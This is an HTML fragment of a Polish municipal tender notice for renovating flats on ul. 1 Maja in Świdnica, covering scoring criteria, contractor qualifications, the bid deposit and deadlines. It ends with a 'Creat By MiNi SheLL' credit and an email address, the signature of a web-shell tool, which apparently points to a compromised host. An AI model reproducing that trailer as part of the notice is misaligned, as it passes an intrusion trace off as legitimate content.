class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>L.p	Kryterium oceny ofert	Waga kryterium<br/>w %<br/>1)	Cena ofertowa brutto – C 60<br/>2)	Okres gwarancji za wykonane roboty budowlane – G 40<br/><br/>2.	Zadanie będzie oceniane zgodnie z kryteriami wymienionymi powyżej. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów <br/>w kryteriach. <br/>3.	Sposób obliczenia punktów w danym kryterium: <br/><br/><br/>1)	Cena ofertowa brutto – C <br/><br/>Cena najtańszej oferty spośród ofert niepodlegających odrzuceniu <br/> C = --------------------------------------------------------------------- x 60pkt<br/> Cena badanej oferty <br/><br/>2)	Okres gwarancji za wykonane roboty budowlane – G <br/><br/> Okres gwarancji za wykonane roboty budowlane badanej oferty (w miesiącach) <br/> G = ----------------------------------------------------------------------------------------------- x 40 pkt<br/> Maksymalny okres gwarancji za wykonane roboty budowlane spośród ofert niepodlegających odrzuceniu<br/><br/>Minimalny okres gwarancji - 36 miesięcy od daty odbioru przedmiotu umowy. <br/>W przypadku zaoferowania przez Wykonawcę krótszej gwarancji, oferta będzie podlegała odrzuceniu na podst. Art. 226 ust. 1 pkt. 5 Pzp. <br/>Maksymalny punktowany przez Zamawiającego okres gwarancji – 60 miesięcy od daty odbioru przedmiotu umowy. W przypadku, gdy którykolwiek z Wykonawców zaoferuje gwarancję licząc od daty odbioru przedmiotu umowy dłuższą niż 60 miesięcy – do obliczeń zostanie przyjęty okres 60 miesięcy.<br/><br/>4.	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + G <br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena ofertowa brutto”,<br/>G – punkty uzyskane w kryterium „Okres gwarancji za wykonane roboty budowlane”. <br/><br/>5.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.<br/>7.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>8.	Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym <br/>w SWZ.<br/>9.	Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, <br/>w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>10.	W przypadku braku zgody, o której mowa w ust. 9, oferta podlega odrzuceniu, <br/>a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji za wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1.	Nie podlegają wykluczeniu z postępowania,<br/>1.2.	Spełniają warunki udziału w postępowaniu dotyczące:<br/>1.2.1.	Zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunków w tym zakresie,<br/>1.2.2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej – Zamawiający nie stawia warunków w tym zakresie,<br/><br/>1.2.3.	Sytuacji ekonomicznej lub finansowej:<br/><br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości minimum 200.000,00 zł (słownie: dwieście tysięcy złotych) oraz, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na sumę gwarancyjną nie mniejszą niż: 200.000,00 zł (słownie: dwieście tysięcy złotych). <br/><br/>1.2.4.	Zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że:	<br/>a)	dysponuje osobami zdolnymi do realizacji zamówienia<br/>Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia, tj.: <br/>1)	kierownikiem budowy – w specjalności konstrukcyjno-budowlanej.<br/>•	liczba osób: 1,<br/>•	uprawnienia budowlane(*): do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń<br/>•	minimalne doświadczenie (**):<br/>- minimum 3 lata doświadczenia w pełnieniu samodzielnych funkcji technicznych <br/>w budownictwie <br/>- wykształcenie wyższe. <br/>2)	kierownikiem robót – w specjalności instalacyjnej w zakresie sieci, instalacji <br/>i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych <br/>•	liczba osób: 1,<br/>•	uprawnienia budowlane(*): do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych <br/>•	minimalne doświadczenie (**):<br/>- minimum 3 lata doświadczenia w pełnieniu samodzielnych funkcji technicznych <br/>w budownictwie <br/>- wykształcenie średnie.<br/>3)	kierownikiem robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/>•	liczba osób: 1,<br/>•	uprawnienia budowlane(*): do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych <br/><br/>•	minimalne doświadczenie (**):<br/>- minimum 3 lata doświadczenia w pełnieniu samodzielnych funkcji technicznych <br/>w budownictwie,<br/>- wykształcenie średnie.<br/>(*)Przez uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w ustawie <br/>z dnia 7 lipca 1994 r. Prawo budowlane (t.j Dz.U. z 2021 poz. 2351) oraz <br/>w Rozporządzeniu Ministra Inwestycji i Rozwoju z dn. 29 kwietnia 2019 roku w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych <br/>w budownictwie (Dz. U. z 2019r poz. 831) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj. Dz.U. z 2021 r. poz. 1646, z późn. zm.) do pełnienia samodzielnej funkcji w budownictwie.<br/>(**)Przez doświadczenie należy rozumieć okres pełnienia samodzielnych funkcji technicznych <br/>w zakresie kierowania robotami budowlanymi, liczony od daty uzyskania uprawnień budowlanych bez ograniczeń w odpowiedniej specjalności (należy podać lata, a w przypadku niepełnych lat - pełne miesiące i pełne lata).<br/>b) posiada niezbędną wiedzę i doświadczenie<br/>Zamawiający uzna, że warunek dotyczący posiadania wiedzy i doświadczenia został spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował (zakończył): co najmniej 2 roboty budowlane (dwie umowy) o wartości nie mniejszej niż 200.000,00 zł brutto każda robota budowlana (słownie: dwieście tysięcy złotych), polegające na budowie lub przebudowie lokali mieszkalnych lub usługowych, wraz z instalacją wody, kanalizacją sanitarną, instalacją CO oraz instalacją elektryczną. <br/>2.	Zamawiający może, na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>1)	warunek, o którym mowa w rozdz. VIII, ust. 1, pkt.1.2.4lit. b SWZ, tj. warunek wiedzy <br/>i doświadczenia nie podlega sumowaniu – oznacza to, że albo Wykonawca składający ofertę wykaże się realizacją dwóch wymaganych robót albo jeden z uczestników konsorcjum wykaże się realizacją dwóch wymaganych robót (warunek wiedzy <br/>i doświadczenia nie będzie spełniony jeżeli wszyscy uczestnicy konsorcjum w sumie wykażą zrealizowanie dwóch robót ale żaden z nich nie wykonał wymaganych dwóch robót) albo w sytuacji gdy Wykonawca, który nie ma wymaganego doświadczenia (nie ma wymaganych dwóch robót) polega na zasobach innego podmiotu - podmiot ten musi wykazać zrealizowanie dwóch wymaganych robót,<br/>2)	warunki, o których mowa w rozdz. VIII, ust. 1, pkt. 1.2.3 i 1.2.4 lit. a SWZ, tj. warunek dotyczący sytuacji ekonomicznej i finansowej oraz warunek dotyczący dysponowania osobami zdolnymi do realizacji zamówienia podlegają sumowaniu. <br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenia zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>5.	W przypadku, o którym mowa wyżej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.	Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia <br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, wymaganych do złożenia w ogłoszeniu o zamówieniu, aktualnych na dzień złożenia, tj:<br/>1)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,<br/>2)	dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/><br/> Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez Zamawiającego podmiotowych środków dowodowych dotyczących sytuacji finansowej lub ekonomicznej wymaganych przez zamawiającego, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu lub kryterium selekcji dotyczącego sytuacji ekonomicznej lub finansowej;<br/><br/>3)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (wzór stanowi Załącznik nr 5 do SWZ) oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/><br/> Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył;<br/><br/>4)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór stanowi Załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4.	Ponadto do oferty należy dołączyć:<br/>1)	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik.<br/>2)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości 3 000,00 zł PLN (słownie złotych: trzy tysiące złotych) <br/>2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku formach wymienionych w art. 97 ust. 7 ustawy PZP, w zależności od wyboru Wykonawcy.<br/>3.	Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale <br/>w postaci dokumentu elektronicznego i musi obejmować cały okres związania ofertą. Oryginał wadium, sporządzony w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez Gwaranta, nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do gwaranta.<br/>4.	W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie obejmowały:<br/>a)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,<br/>b)	kwotę gwarancji,<br/>c)	termin ważności gwarancji w formule: „od dnia ………… - do dnia…………&#34;,<br/>d)	odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 98 ust. 6 ustawy PZP.<br/>e)	nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium płatne na pierwsze pisemne żądanie Zamawiającego,<br/>f)	sposób przesłania żądania zapłaty, z podaniem adresu poczty elektronicznej, na który zostanie przesłane wezwanie żądania zapłaty oraz terminu na dostarczenie żądania nie później niż do 3 dni po upływie terminu ważności wadium (forma pisemna lub forma elektroniczna opatrzona kwalifikowanym podpisem elektronicznym pod rygorem nieważności).<br/>5.	Wierzytelność z tytułu gwarancji/poręczenia nie może być przedmiotem przelewu na rzecz osoby trzeciej.<br/>6.	Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione. Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji sądów polskich, chyba, że wynika to <br/>z przepisów prawa.<br/>7.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku PeKaO SA oddział I w Świdnicy nr 96 1240 1978 1111 0010 0166 5724, z dopiskiem na przelewie: „Wadium <br/>w postępowaniu nr P-123/XI/22 - „Przebudowa lokali mieszkalnych przy ul. 1 Maja w Świdnicy” ”<br/>8.	Ze względu na ryzyko związane z okresem rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem. Skuteczne wniesienie wadium <br/>w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w ust. 7, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>9.	W przypadku korzystania przez Wykonawcę z systemu umożliwiającego dokonywanie natychmiastowych przelewów między kontami w różnych bankach, Wykonawca zobowiązany jest tak opisać tytuł przelewu, aby wynikało z niego kto wpłaca wadium <br/>i jakiego przetargu dotyczy wpłata.<br/>10.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ustawy PZP.<br/>11.	Zamawiający zatrzyma wadium wraz z odsetkami, w przypadkach określonych w art. 98 ust. 6 ustawy PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w X ust. 2 pkt 1) i 2) SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału <br/>w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość istotnych zmian niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiana umowy dopuszczalna będzie w granicach wyznaczonych w art. 455 ustawy Pzp. Ze względu na ograniczenia techniczne, związane z ilością znaków możliwych do wprowadzenia w punkcie &#34;Rodzaj i zakres<br/>zmian umowy oraz warunków ich wprowadzenia&#34; Zamawiający informuje, że przewiduje zmiany umowy zgodnie z<br/>Rozdziałem XXIV Specyfikacji Warunków Zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umswidnica.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-18 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-17</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawca, którego oferta zostanie wybrana, zobowiązany będzie do wniesienia zabezpieczenia należytego wykonania umowy najpóźniej w dniu jej zawarcia, w wysokości 5% ceny całkowitej brutto podanej w ofercie.<br/>2.	Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:<br/>1)	pieniądzu,<br/>2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,<br/>3)	gwarancjach bankowych,<br/>4)	gwarancjach ubezpieczeniowych,<br/>5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt <br/>2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r., poz. 310 t.j.).<br/>3.	Zamawiający wyraża zgodę na wniesienie zabezpieczenia w formach określonych w art. 450 ust. 2 ustawy PZP.<br/>4.	Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego.<br/>5.	W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.<br/>6.	Jeżeli zabezpieczenie wniesiono w pieniądzu, zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione <br/>w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.<br/>7.	Z treści zabezpieczenia przedstawionego w formie gwarancji/poręczenia winno wynikać, że bank/ubezpieczyciel/poręczyciel zapłaci, na rzecz Zamawiającego w terminie maksymalnie 30 dni od pisemnego żądania kwotę zabezpieczenia, na pierwsze wezwanie Zamawiającego, bez odwołania, bez warunku, niezależnie od kwestionowania czy zastrzeżeń Wykonawcy <br/>i bez dochodzenia czy wezwanie Zamawiającego jest uzasadnione czy nie.<br/>8.	W przypadku, gdy zabezpieczenie, będzie wnoszone w formie innej niż pieniądz, Zamawiający zastrzega sobie prawo do akceptacji projektu ww. dokumentu.<br/>9.	Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>10.	Zamawiający zwraca zabezpieczenie w terminie 30 dni od dnia wykonania zamówienia <br/>i uznania przez zamawiającego za należycie wykonane.<br/>11.	Zamawiający pozostawia na zabezpieczenie roszczeń z tytułu rękojmi za wady lub gwarancji kwotę 30% zabezpieczenia.<br/>12.	Zamawiający zwraca zabezpieczenie w terminie 30 dni od dnia wykonania zamówienia <br/>i uznania przez Zamawiającego za należycie wykonane.<br/>13.	Kwota pozostawiona na zabezpieczenie roszczeń z tytułu rękojmi za wady lub gwarancji jest zwracana nie później niż w 15 dniu po upływie okresu rękojmi za wady lub gwarancji.

Creat By MiNi SheLL
Email: jattceo@gmail.com